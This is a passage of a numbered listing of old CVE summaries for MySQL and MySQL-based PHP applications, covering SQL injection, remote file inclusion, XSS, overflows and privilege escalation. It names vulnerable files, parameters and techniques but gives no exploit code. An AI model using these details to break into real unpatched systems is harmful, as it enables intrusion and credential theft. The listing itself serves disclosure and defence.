19037| [CVE-2007-5970] MySQL 5.1.x before 5.1.23 and 6.0.x before 6.0.4 allows remote authenticated users to gain privileges on arbitrary tables via unspecified vectors involving use of table-level DATA DIRECTORY and INDEX DIRECTORY options when creating a partitioned table with the same name as a table on which the user lacks privileges.
19038| [CVE-2007-5969] MySQL Community Server 5.0.x before 5.0.51, Enterprise Server 5.0.x before 5.0.52, Server 5.1.x before 5.1.23, and Server 6.0.x before 6.0.4, when a table relies on symlinks created through explicit DATA DIRECTORY and INDEX DIRECTORY options, allows remote authenticated users to overwrite system table information and gain privileges via a RENAME TABLE statement that changes the symlink to point to an existing file.
19039| [CVE-2007-5925] The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.
19040| [CVE-2007-5646] SQL injection vulnerability in Sources/Search.php in Simple Machines Forum (SMF) 1.1.3, when MySQL 5 is used, allows remote attackers to execute arbitrary SQL commands via the userspec parameter in a search2 action to index.php.
19041| [CVE-2007-5626] make_catalog_backup in Bacula 2.2.5, and probably earlier, sends a MySQL password as a command line argument, and sometimes transmits cleartext e-mail containing this command line, which allows context-dependent attackers to obtain the password by listing the process and its arguments, or by sniffing the network.
19042| [CVE-2007-5488] Multiple SQL injection vulnerabilities in cdr_addon_mysql in Asterisk-Addons before 1.2.8, and 1.4.x before 1.4.4, allow remote attackers to execute arbitrary SQL commands via the (1) source and (2) destination numbers, and probably (3) SIP URI, when inserting a record.
19043| [CVE-2007-4889] The MySQL extension in PHP 5.2.4 and earlier allows remote attackers to bypass safe_mode and open_basedir restrictions via the MySQL (1) LOAD_FILE, (2) INTO DUMPFILE, and (3) INTO OUTFILE functions, a different issue than CVE-2007-3997.
19044| [CVE-2007-3997] The (1) MySQL and (2) MySQLi extensions in PHP 4 before 4.4.8, and PHP 5 before 5.2.4, allow remote attackers to bypass safe_mode and open_basedir restrictions via MySQL LOCAL INFILE operations, as demonstrated by a query with LOAD DATA LOCAL INFILE.
19045| [CVE-2007-3782] MySQL Community Server before 5.0.45 allows remote authenticated users to gain update privileges for a table in another database via a view that refers to this external table.
19046| [CVE-2007-3781] MySQL Community Server before 5.0.45 does not require privileges such as SELECT for the source table in a CREATE TABLE LIKE statement, which allows remote authenticated users to obtain sensitive information such as the table structure.
19047| [CVE-2007-3780] MySQL Community Server before 5.0.45 allows remote attackers to cause a denial of service (daemon crash) via a malformed password packet in the connection protocol.
19048| [CVE-2007-3567] MySQLDumper 1.21b through 1.23 REV227 uses a "Limit GET" statement in the .htaccess authentication mechanism, which allows remote attackers to bypass authentication requirements via HTTP POST requests.
19049| [CVE-2007-2857] PHP remote file inclusion vulnerability in sample/xls2mysql in ABC Excel Parser Pro 4.0 allows remote attackers to execute arbitrary PHP code via a URL in the parser_path parameter.
19050| [CVE-2007-2766] lib/backup-methods.sh in Backup Manager before 0.7.6 provides the MySQL password as a plaintext command line argument, which allows local users to obtain this password by listing the process and its arguments, related to lib/backup-methods.sh.
19051| [CVE-2007-2693] MySQL before 5.1.18 allows remote authenticated users without SELECT privileges to obtain sensitive information from partitioned tables via an ALTER TABLE statement.
19052| [CVE-2007-2692] The mysql_change_db function in MySQL 5.0.x before 5.0.40 and 5.1.x before 5.1.18 does not restore THD::db_access privileges when returning from SQL SECURITY INVOKER stored routines, which allows remote authenticated users to gain privileges.
19053| [CVE-2007-2691] MySQL before 4.1.23, 5.0.x before 5.0.42, and 5.1.x before 5.1.18 does not require the DROP privilege for RENAME TABLE statements, which allows remote authenticated users to rename arbitrary tables.
19054| [CVE-2007-2583] The in_decimal::set function in item_cmpfunc.cc in MySQL before 5.0.40, and 5.1 before 5.1.18-beta, allows context-dependent attackers to cause a denial of service (crash) via a crafted IF clause that results in a divide-by-zero error and a NULL pointer dereference.
19055| [CVE-2007-2554] Associated Press (AP) Newspower 4.0.1 and earlier uses a default blank password for the MySQL root account, which allows remote attackers to insert or modify news articles via shows.tblscript.
19056| [CVE-2007-2429] ManageEngine PasswordManager Pro (PMP) allows remote attackers to obtain administrative access to a database by injecting a certain command line for the mysql program, as demonstrated by the "-port 2345" and "-u root" arguments. NOTE: the provenance of this information is unknown
19057| [CVE-2007-2364] Multiple PHP remote file inclusion vulnerabilities in burnCMS 0.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the root parameter to (1) mysql.class.php or (2) postgres.class.php in lib/db/
19058| [CVE-2007-2204] Multiple PHP remote file inclusion vulnerabilities in GPL PHP Board (GPB) unstable-2001.11.14-1 allow remote attackers to execute arbitrary PHP code via a URL in the root_path parameter to (1) db.mysql.inc.php or (2) gpb.inc.php in include/, or the (3) theme parameter to themes/ubb/login.php.
19059| [CVE-2007-2016] Cross-site scripting (XSS) vulnerability in mysql/phpinfo.php in phpMyAdmin 2.6.1 allows remote attackers to inject arbitrary web script or HTML via the lang[] parameter.
19060| [CVE-2007-1779] Multiple SQL injection vulnerabilities in the MySQL back-end in Advanced Website Creator (AWC) before 1.9.0 might allow remote attackers to execute arbitrary SQL commands via unspecified parameters, related to use of mysql_escape_string instead of mysql_real_escape_string.
19061| [CVE-2007-1778] PHP remote file inclusion vulnerability in db/mysql.php in the Eve-Nuke 0.1 (EN-Forums) module for PHP-Nuke allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
19062| [CVE-2007-1548] SQL injection vulnerability in functions/functions_filters.asp in Web Wiz Forums before 8.05a (MySQL version) does not properly filter certain characters in SQL commands, which allows remote attackers to execute arbitrary SQL commands via \"' (backslash double-quote quote) sequences, which are collapsed into \'', as demonstrated via the name parameter to forum/pop_up_member_search.asp.
19063| [CVE-2007-1455] Multiple absolute path traversal vulnerabilities in Fantastico, as used with cPanel 10.x, allow remote authenticated users to include and execute arbitrary local files via (1) the userlanguage parameter to includes/load_language.php or (2) the fantasticopath parameter to includes/mysqlconfig.php and certain other files.
19064| [CVE-2007-1439] PHP remote file inclusion vulnerability in ressourcen/dbopen.php in bitesser MySQL Commander 2.7 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the home parameter.
19065| [CVE-2007-1420] MySQL 5.x before 5.0.36 allows local users to cause a denial of service (database crash) by performing information_schema table subselects and using ORDER BY to sort a single-row result, which prevents certain structure elements from being initialized and triggers a NULL dereference in the filesort function.
19066| [CVE-2007-1167] inc/filebrowser/browser.php in deV!L`z Clanportal (DZCP) 1.4.5 and earlier allows remote attackers to obtain MySQL data via the inc/mysql.php value of the file parameter.
19067| [CVE-2007-1111] Multiple cross-site scripting (XSS) vulnerabilities in ActiveCalendar 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the css parameter to (1) flatevents.php, (2) js.php, (3) mysqlevents.php, (4) m_2.php, (5) m_3.php, (6) m_4.php, (7) xmlevents.php, (8) y_2.php, or (9) y_3.php in data/.
19068| [CVE-2007-0926] The dologin function in guestbook.php in KvGuestbook 1.0 Beta allows remote attackers to gain administrative privileges, probably via modified $mysql['pass'] and $gbpass variables.
19069| [CVE-2007-0890] Cross-site scripting (XSS) vulnerability in scripts/passwdmysql in cPanel WebHost Manager (WHM) 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter.
19070| [CVE-2007-0828] PHP remote file inclusion vulnerability in affichearticles.php3 in MySQLNewsEngine allows remote attackers to execute arbitrary PHP code via a URL in the newsenginedir parameter.
19071| [CVE-2007-0167] Multiple PHP file inclusion vulnerabilities in WGS-PPC (aka PPC Search Engine), as distributed with other aliases, allow remote attackers to execute arbitrary PHP code via a URL in the INC parameter in (1) config_admin.php, (2) config_main.php, (3) config_member.php, and (4) mysql_config.php in config/
19072| [CVE-2007-0124] Unspecified vulnerability in Drupal before 4.6.11, and 4.7 before 4.7.5, when MySQL is used, allows remote authenticated users to cause a denial of service by poisoning the page cache via unspecified vectors, which triggers erroneous 404 HTTP errors for pages that exist.
19073| [CVE-2006-7232] sql_select.cc in MySQL 5.0.x before 5.0.32 and 5.1.x before 5.1.14 allows remote authenticated users to cause a denial of service (crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA table, as originally demonstrated using ORDER BY.
19074| [CVE-2006-7194] PHP remote file inclusion vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php in Agora 1.4 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the _SESSION[PATH_COMPOSANT] parameter.
19075| [CVE-2006-6948] MyODBC Japanese conversion edition 3.51.06, 2.50.29, and 2.50.25 allows remote attackers to cause a denial of service via a certain string in a response, which has unspecified impact on the MySQL database.
19076| [CVE-2006-6457] tiki-wiki_rss.php in Tikiwiki 1.9.5, 1.9.2, and possibly other versions allows remote attackers to obtain sensitive information (MySQL username and password) via an invalid (large or negative) ver parameter, which leaks the information in an error message.
19077| [CVE-2006-6378] BTSaveMySql 1.2 stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain configuration and save files via direct requests.
19078| [CVE-2006-6254] administration/telecharger.php in Cahier de texte 2.0 allows remote attackers to obtain unparsed content (source code) of files via the chemin parameter, as demonstrated using directory traversal sequences to obtain the MySQL username and password from conn_cahier_de_texte.php. NOTE: it is not clear whether the scope of this issue extends above the web document root, and whether directory traversal is the primary vulnerability.
19079| [CVE-2006-5893] Multiple PHP remote file inclusion vulnerabilities in iWonder Designs Storystream 0.4.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter to (1) mysql.php and (2) mysqli.php in include/classes/pear/DB/.
19080| [CVE-2006-5702] Tikiwiki 1.9.5 allows remote attackers to obtain sensitive information (MySQL username and password) via an empty sort_mode parameter in (1) tiki-listpages.php, (2) tiki-lastchanges.php, (3) messu-archive.php, (4) messu-mailbox.php, (5) messu-sent.php, (6) tiki-directory_add_site.php, (7) tiki-directory_ranking.php, (8) tiki-directory_search.php, (9) tiki-forums.php, (10) tiki-view_forum.php, (11) tiki-friends.php, (12) tiki-list_blogs.php, (13) tiki-list_faqs.php, (14) tiki-list_trackers.php, (15) tiki-list_users.php, (16) tiki-my_tiki.php, (17) tiki-notepad_list.php, (18) tiki-orphan_pages.php, (19) tiki-shoutbox.php, (20) tiki-usermenu.php, and (21) tiki-webmail_contacts.php, which reveal the information in certain database error messages.
19081| [CVE-2006-5675] Multiple unspecified vulnerabilities in Pentaho Business Intelligence (BI) Suite before 1.2 RC3 (1.2.0.470-RC3) have unknown impact and attack vectors, related to "MySQL Scripts need changes for security," possibly SQL injection vulnerabilities associated with these scripts.
19082| [CVE-2006-5381] Contenido CMS stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain database credentials and other information via a direct request to (1) db_msql.inc, (2) db_mssql.inc, (3) db_mysqli.inc, (4) db_oci8.inc, (5) db_odbc.inc, (6) db_oracle.inc, (7) db_pgsql.inc, or (8) db_sybase.inc in the conlib/ directory.
19083| [CVE-2006-5264] Cross-site scripting (XSS) vulnerability in sql.php in MysqlDumper 1.21 b6 allows remote attackers to inject arbitrary web script or HTML via the db parameter.
19084| [CVE-2006-5127] Multiple cross-site scripting (XSS) vulnerabilities in Bartels Schoene ConPresso before 4.0.5a allow remote attackers to inject arbitrary web script or HTML via (1) the nr parameter in detail.php, (2) the msg parameter in db_mysql.inc.php, and (3) the pos parameter in index.php.
19085| [CVE-2006-5079] PHP remote file inclusion vulnerability in class.mysql.php in Matt Humphrey paBugs 2.0 Beta 3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path_to_bt_dir parameter.
19086| [CVE-2006-5065] PHP remote file inclusion vulnerability in libs/dbmax/mysql.php in ZoomStats 1.0.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[lib][db][path] parameter.
19087| [CVE-2006-5029] SQL injection vulnerability in thread.php in WoltLab Burning Board (wBB) 2.3.x allows remote attackers to obtain the version numbers of PHP, MySQL, and wBB via the page parameter. NOTE: this issue might be a forced SQL error. Also, the original report was disputed by a third party for 2.3.3 and 2.3.4.
19088| [CVE-2006-5027] Jeroen Vennegoor JevonCMS, possibly pre alpha, allows remote attackers to obtain sensitive information via a direct request for php/main/phplib files (1) db_msql.inc, (2) db_mssql.inc, (3) db_mysql.inc, (4) db_oci8.inc, (5) db_odbc.inc, (6) db_oracle.inc, and (7) db_pgsql.inc
19089| [CVE-2006-5014] Unspecified vulnerability in cPanel before 10.9.0 12 Tree allows remote authenticated users to gain privileges via unspecified vectors in (1) mysqladmin and (2) hooksadmin.
19090| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
19091| [CVE-2006-4835] Bluview Blue Magic Board (BMB) (aka BMForum) 5.5 allows remote attackers to obtain sensitive information via a direct request to (1) footer.php, (2) header.php, (3) db_mysql_error.php, (4) langlist.php, (5) sendmail.php, or (6) style.php, which reveals the path in various error messages.
19092| [CVE-2006-4578] export.php in The Address Book 1.04e writes username and password hash information into a publicly accessible file when dumping the MySQL database contents, which allows remote attackers to obtain sensitive information.
19093| [CVE-2006-4380] MySQL before 4.1.13 allows local users to cause a denial of service (persistent replication slave crash) via a query with multiupdate and subselects.
19094| [CVE-2006-4277] Multiple PHP remote file inclusion vulnerabilities in Tutti Nova 1.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the TNLIB_DIR parameter to (1) include/novalib/class.novaAdmin.mysql.php and (2) novalib/class.novaRead.mysql.php. NOTE: the provenance of this information is unknown
19095| [CVE-2006-4276] PHP remote file inclusion vulnerability in Tutti Nova 1.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the TNLIB_DIR parameter to novalib/class.novaEdit.mysql.php.
19096| [CVE-2006-4227] MySQL before 5.0.25 and 5.1 before 5.1.12 evaluates arguments of suid routines in the security context of the routine's definer instead of the routine's caller, which allows remote authenticated users to gain privileges through a routine that has been made available using GRANT EXECUTE.
19097| [CVE-2006-4226] MySQL before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions.
19098| [CVE-2006-4031] MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy.
19099| [CVE-2006-3965] Banex PHP MySQL Banner Exchange 2.21 stores lib.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as database usernames and passwords.
19100| [CVE-2006-3964] PHP remote file inclusion vulnerability in members.php in Banex PHP MySQL Banner Exchange 2.21 allows remote attackers to execute arbitrary PHP code via a URL in the cfg_root parameter.
19101| [CVE-2006-3963] Multiple SQL injection vulnerabilities in Banex PHP MySQL Banner Exchange 2.21 allow remote attackers to execute arbitrary SQL commands via the (1) site_name parameter to (a) signup.php, and the (2) id, (3) deleteuserbanner, (4) viewmem, (5) viewmemunb, (6) viewunmem,or (7) deleteuser parameters to (b) admin.php.
19102| [CVE-2006-3878] Opsware Network Automation System (NAS) 6.0 installs /etc/init.d/mysql with insecure permissions, which allows local users to read the root password for the MySQL MAX database or gain privileges by modifying /etc/init.d/mysql.
19103| [CVE-2006-3486] ** DISPUTED ** Off-by-one buffer overflow in the Instance_options::complete_initialization function in instance_options.cc in the Instance Manager in MySQL before 5.0.23 and 5.1 before 5.1.12 might allow local users to cause a denial of service (application crash) via unspecified vectors, which triggers the overflow when the convert_dirname function is called. NOTE: the vendor has disputed this issue via e-mail to CVE, saying that it is only exploitable when the user has access to the configuration file or the Instance Manager daemon. Due to intended functionality, this level of access would already allow the user to disrupt program operation, so this does not cross security boundaries and is not a vulnerability.
19104| [CVE-2006-3469] Format string vulnerability in time.cc in MySQL Server 4.1 before 4.1.21 and 5.0 before 1 April 2006 allows remote authenticated users to cause a denial of service (crash) via a format string instead of a date as the first parameter to the date_format function, which is later used in a formatted print call to display the error message.
19105| [CVE-2006-3330] Cross-site scripting (XSS) vulnerability in AddAsset1.php in PHP/MySQL Classifieds (PHP Classifieds) allows remote attackers to execute arbitrary SQL commands via the (1) ProductName ("Title" field), (2) url, and (3) Description parameters, possibly related to issues in add1.php.
19106| [CVE-2006-3329] SQL injection vulnerability in search.php in PHP/MySQL Classifieds (PHP Classifieds) allows remote attackers to execute arbitrary SQL commands via the rate parameter.
19107| [CVE-2006-3081] mysqld in MySQL 4.1.x before 4.1.18, 5.0.x before 5.0.19, and 5.1.x before 5.1.6 allows remote authorized users to cause a denial of service (crash) via a NULL second argument to the str_to_date function.
19108| [CVE-2006-2753] SQL injection vulnerability in MySQL 4.1.x before 4.1.20 and 5.0.x before 5.0.22 allows context-dependent attackers to execute arbitrary SQL commands via crafted multibyte encodings in character sets such as SJIS, BIG5, and GBK, which are not properly handled when the mysql_real_escape function is used to escape the input.
19109| [CVE-2006-2750] Cross-site scripting (XSS) vulnerability in the do_mysql_query function in core.php for Open Searchable Image Catalogue (OSIC) before 0.7.0.1 allows remote attackers to inject arbitrary web scripts or HTML via failed SQL queries, which is reflected in an error message.
19110| [CVE-2006-2748] SQL injection vulnerability in the do_mysql_query function in core.php for Open Searchable Image Catalogue (OSIC) before 0.7.0.1 allows remote attackers to inject arbitrary SQL commands via multiple vectors, as demonstrated by the (1) type parameter in adminfunctions.php and the (2) catalogue_id parameter in editcatalogue.php.
19111| [CVE-2006-2742] SQL injection vulnerability in Drupal 4.6.x before 4.6.7 and 4.7.0 allows remote attackers to execute arbitrary SQL commands via the (1) count and (2) from variables to (a) database.mysql.inc, (b) database.pgsql.inc, and (c) database.mysqli.inc.
19112| [CVE-2006-2543] Xtreme Topsites 1.1 allows remote attackers to trigger MySQL errors and possibly conduct SQL injection attacks via unspecified vectors in join.php.
19113| [CVE-2006-2329] AngelineCMS 0.6.5 and earlier allow remote attackers to obtain sensitive information via a direct request for (1) adodb-access.inc.php, (2) adodb-ado.inc.php, (3) adodb-ado_access.inc, (4) adodb-ado_mssql.inc.php, (5) adodb-borland_ibase, (6) adodb-csv.inc.php, (7) adodb-db2.inc.php, (8) adodb-fbsql.inc.php, (9) adodb-firebird.inc.php, (10) adodb-ibase.inc.php, (11) adodb-informix.inc.php, (12) adodb-informix72.inc, (13) adodb-mssql.inc.php, (14) adodb-mssqlpo.inc.php, (15) adodb-mysql.inc.php, (16) adodb-mysqlt.inc.php, (17) adodb-oci8.inc.php, (18) adodb-oci805.inc.php, (19) adodb-oci8po.inc.php, and (20) adodb-odbc.inc.php, which reveal the path in various error messages
19114| [CVE-2006-2042] Adobe Dreamweaver 8 before 8.0.2 and MX 2004 can generate code that allows SQL injection attacks in the (1) ColdFusion, (2) PHP mySQL, (3) ASP, (4) ASP.NET, and (5) JSP server models.
19115| [CVE-2006-1930] ** DISPUTED ** Multiple SQL injection vulnerabilities in userscript.php in Green Minute 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) huserid, (2) pituus, or (3) date parameters. NOTE: this issue has been disputed by the vendor, saying "those parameters mentioned ARE checked (preg_match) before they are used in SQL-query... If someone decided to add SQL-injection stuff to certain parameter, they would see an error text, but only because _nothing_ was passed inside that parameter (to MySQL-database)." As allowed by the vendor, CVE investigated this report on 20060525 and found that the demo site demonstrated a non-sensitive SQL error when given standard SQL injection manipulations.
19116| [CVE-2006-1518] Buffer overflow in the open_table function in sql_base.cc in MySQL 5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary code via crafted COM_TABLE_DUMP packets with invalid length values.
19117| [CVE-2006-1517] sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to obtain sensitive information via a COM_TABLE_DUMP request with an incorrect packet length, which includes portions of memory in an error message.
19118| [CVE-2006-1516] The check_connection function in sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to read portions of memory via a username without a trailing null byte, which causes a buffer over-read.
19119| [CVE-2006-1451] MySQL Manager in Apple Mac OS X 10.3.9 and 10.4.6, when setting up a new MySQL database server, does not use the "New MySQL root password" that is provided, which causes the MySQL root password to be blank and allows local users to gain full privileges to that database.
19120| [CVE-2006-1396] Multiple cross-site scripting (XSS) vulnerabilities in Cholod MySQL Based Message Board allow remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown
19121| [CVE-2006-1395] SQL injection vulnerability in mb.cgi in Cholod MySQL Based Message Board allows remote attackers to execute arbitrary SQL commands via unspecified vectors in a showmessage action, possibly the username parameter. NOTE: the provenance of this information is unknown
19122| [CVE-2006-1324] Cross-site scripting (XSS) vulnerability in acp/lib/class_db_mysql.php in Woltlab Burning Board (wBB) 2.3.4 allows remote attackers to inject arbitrary web script or HTML via the errormsg parameter when a SQL error is generated.
19123| [CVE-2006-1211] IBM Tivoli Micromuse Netcool/NeuSecure 3.0.236 configures a MySQL database to allow connections from any source IP address with the ns database account, which allows remote attackers to bypass the Netcool/NeuSecure application layer and perform unauthorized database actions. NOTE: IBM has privately confirmed to CVE that a fix is available for these issues.
19124| [CVE-2006-1210] The web interface for IBM Tivoli Micromuse Netcool/NeuSecure 3.0.236 includes the MySQL database username and password in cleartext in body.phtml, which allows remote attackers to gain privileges by reading the source. NOTE: IBM has privately confirmed to CVE that a fix is available for these issues.
19125| [CVE-2006-1112] Aztek Forum 4.0 allows remote attackers to obtain sensitive information via a long login value in a register form, which displays the installation path in a MySQL error message.
19126| [CVE-2006-1111] Aztek Forum 4.0 allows remote attackers to obtain sensitive information via a "*/*" in the msg parameter to index.php, which reveals usernames and passwords in a MySQL error message, possibly due to a forced SQL error or SQL injection.
19127| [CVE-2006-0909] Invision Power Board (IPB) 2.1.4 and earlier allows remote attackers to view sensitive information via a direct request to multiple PHP scripts that include the full path in error messages, including (1) PEAR/Text/Diff/Renderer/inline.php, (2) PEAR/Text/Diff/Renderer/unified.php, (3) PEAR/Text/Diff3.php, (4) class_db.php, (5) class_db_mysql.php, and (6) class_xml.php in the ips_kernel/ directory
19128| [CVE-2006-0903] MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query.
19129| [CVE-2006-0692] Multiple SQL injection vulnerabilities in Carey Briggs PHP/MYSQL Timesheet 1 and 2 allow remote attackers to execute arbitrary SQL commands via the (1) yr, (2) month, (3) day, and (4) job parameters in (a) index.php and (b) changehrs.php.
19130| [CVE-2006-0369] ** DISPUTED ** MySQL 5.0.18 allows local users with access to a VIEW to obtain sensitive information via the "SELECT * FROM information_schema.views
19131| [CVE-2006-0200] Format string vulnerability in the error-reporting feature in the mysqli extension in PHP 5.1.0 and 5.1.1 might allow remote attackers to execute arbitrary code via format string specifiers in MySQL error messages.
19132| [CVE-2006-0146] The server.php test script in ADOdb for PHP before 4.70, as used in multiple products including (1) Mantis, (2) PostNuke, (3) Moodle, (4) Cacti, (5) Xaraya, (6) PHPOpenChat, (7) MAXdev MD-Pro, and (8) MediaBeez, when the MySQL root password is empty, allows remote attackers to execute arbitrary SQL commands via the sql parameter.
19133| [CVE-2006-0097] Stack-based buffer overflow in the create_named_pipe function in libmysql.c in PHP 4.3.10 and 4.4.x before 4.4.3 for Windows allows attackers to execute arbitrary code via a long (1) arg_host or (2) arg_unix_socket argument, as demonstrated by a long named pipe variable in the host argument to the mysql_connect function.
19134| [CVE-2006-0056] Double free vulnerability in the authentication and authentication token alteration code in PAM-MySQL 0.6.x before 0.6.2 and 0.7.x before 0.7pre3 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted passwords, which lead to a double free of a pointer that was created by the pam_get_item function. NOTE: this issue only occurs in certain configurations in which there are multiple PAM modules, PAM-MySQL is not evaluated first, and there are no requisite modules before PAM-MySQL.
19135| [CVE-2005-4713] Unspecified vulnerability in the SQL logging facility in PAM-MySQL 0.6.x before 0.6.2 and 0.7.x before 0.7pre3 allows remote attackers to cause a denial of service (segmentation fault) via unspecified vectors, probably involving the pam_mysql_sql_log function when being used in vsftpd, which does not include the IP address argument to an sprintf call.
19136| [CVE-2005-4661] The notifyendsubs cron job in Campsite before 2.3.3 sends an e-mail message containing a certain unencrypted MySQL password, which allows remote attackers to sniff the password.
19137| [CVE-2005-4626] The default configuration of Recruitment Software installs admin/site.xml under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information (MySQL database credentials) via a direct request.
19138| [CVE-2005-4237] Cross-site scripting (XSS) vulnerability in MySQL Auction 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters, possibly the keyword parameter in the SearchZoom module.
19139| [CVE-2005-2865] Multiple PHP remote file inclusion vulnerabilities in aMember Pro 2.3.4 allow remote attackers to execute arbitrary PHP code via the config[root_dir] parameter to (1) mysql.inc.php, (2) efsnet.inc.php, (3) theinternetcommerce.inc.php, (4) cdg.inc.php, (5) compuworld.inc.php, (6) directone.inc.php, (7) authorize_aim.inc.php, (8) beanstream.inc.php, (9) config.inc.php, (10) eprocessingnetwork.inc.php, (11) eway.inc.php, (12) linkpoint.inc.php, (13) logiccommerce.inc.php, (14) netbilling.inc.php, (15) payflow_pro.inc.php, (16) paymentsgateway.inc.php, (17) payos.inc.php, (18) payready.inc.php, or (19) plugnplay.inc.php.
19140| [CVE-2005-2573] The mysql_create_function function in sql_udf.cc for MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta, when running on Windows, uses an incomplete blacklist in a directory traversal check, which allows attackers to include arbitrary files via the backslash (\) character.
19141| [CVE-2005-2572] MySQL, when running on Windows, allows remote authenticated users with insert privileges on the mysql.func table to cause a denial of service (server hang) and possibly execute arbitrary code via (1) a request for a non-library file, which causes the Windows LoadLibraryEx function to block, or (2) a request for a function in a library that has the XXX_deinit or XXX_init functions defined but is not tailored for mySQL, such as jpeg1x32.dll and jpeg2x32.dll.
19142| [CVE-2005-2571] FunkBoard 0.66CF, and possibly earlier versions, does not properly restrict access to the (1) admin/mysql_install.php and (2) admin/pg_install.php scripts, which allows attackers to obtain the database username and password or inject arbitrary PHP code into info.php.
19143| [CVE-2005-2558] Stack-based buffer overflow in the init_syms function in MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta allows remote authenticated users who can create user-defined functions to execute arbitrary code via a long function_name field.
19144| [CVE-2005-2468] Multiple SQL injection vulnerabilities in MySQL Eventum 1.5.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) isCorrectPassword or (2) userExist function in class.auth.php, getCustomFieldReport function in (4) custom_fields.php, (5) custom_fields_graph.php, or (6) class.report.php, or the insert function in (7) releases.php or (8) class.release.php.
19145| [CVE-2005-2467] Multiple cross-site scripting (XSS) vulnerabilities in MySQL Eventum 1.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to view.php, (2) release parameter to list.php, or (3) F parameter to get_jsrs_data.php.
19146| [CVE-2005-2174] Bugzilla 2.17.x, 2.18 before 2.18.2, 2.19.x, and 2.20 before 2.20rc1 inserts a bug into the database before it is marked private, which introduces a race condition and allows attackers to access information about the bug via buglist.cgi before MySQL replication is complete.
19147| [CVE-2005-1944] xmysqladmin 1.0 and earlier allows local users to delete arbitrary files via a symlink attack on a database backup file in /tmp.
19148| [CVE-2005-1636] mysql_install_db in MySQL 4.1.x before 4.1.12 and 5.x up to 5.0.4 creates the mysql_install_db.X file with a predictable filename and insecure permissions, which allows local users to execute arbitrary SQL commands by modifying the file's contents.
19149| [CVE-2005-1274] Stack-based buffer overflow in the getIfHeader function in the WebDAV functionality in MySQL MaxDB before 7.5.00.26 allows remote attackers to execute arbitrary code via an HTTP unlock request and a long "If" parameter.
19150| [CVE-2005-1121] Format string vulnerability in the my_xlog function in lib.c for Oops! Proxy Server 1.5.23 and earlier, as called by the auth functions in the passwd_mysql and passwd_pgsql modules, may allow attackers to execute arbitrary code via a URL.
19151| [CVE-2005-0799] MySQL 4.1.9, and possibly earlier versions, allows remote attackers with certain privileges to cause a denial of service (application crash) via a use command followed by an MS-DOS device name such as (1) LPT1 or (2) PRN.
19152| [CVE-2005-0711] MySQL 4.0.23 and earlier, and 4.1.x up to 4.1.10, uses predictable file names when creating temporary tables, which allows local users with CREATE TEMPORARY TABLE privileges to overwrite arbitrary files via a symlink attack.
19153| [CVE-2005-0710] MySQL 4.0.23 and earlier, and 4.1.x up to 4.1.10, allows remote authenticated users with INSERT and DELETE privileges to bypass library path restrictions and execute arbitrary libraries by using INSERT INTO to modify the mysql.func table, which is processed by the udf_init function.
19154| [CVE-2005-0709] MySQL 4.0.23 and earlier, and 4.1.x up to 4.1.10, allows remote authenticated users with INSERT and DELETE privileges to execute arbitrary code by using CREATE FUNCTION to access libc calls, as demonstrated by using strcat, on_exit, and exit.
19155| [CVE-2005-0684] Multiple buffer overflows in the web tool for MySQL MaxDB before 7.5.00.26 allows remote attackers to execute arbitrary code via (1) an HTTP GET request with a long file parameter after a percent ("%") sign or (2) a long Lock-Token string to the WebDAV functionality, which is not properly handled by the getLockTokenHeader function in WDVHandler_CommonUtils.c.
19156| [CVE-2005-0646] SQL injection vulnerability in auth.php in paNews 2.0.4b allows remote attackers to execute arbitrary SQL via the mysql_prefix parameter.
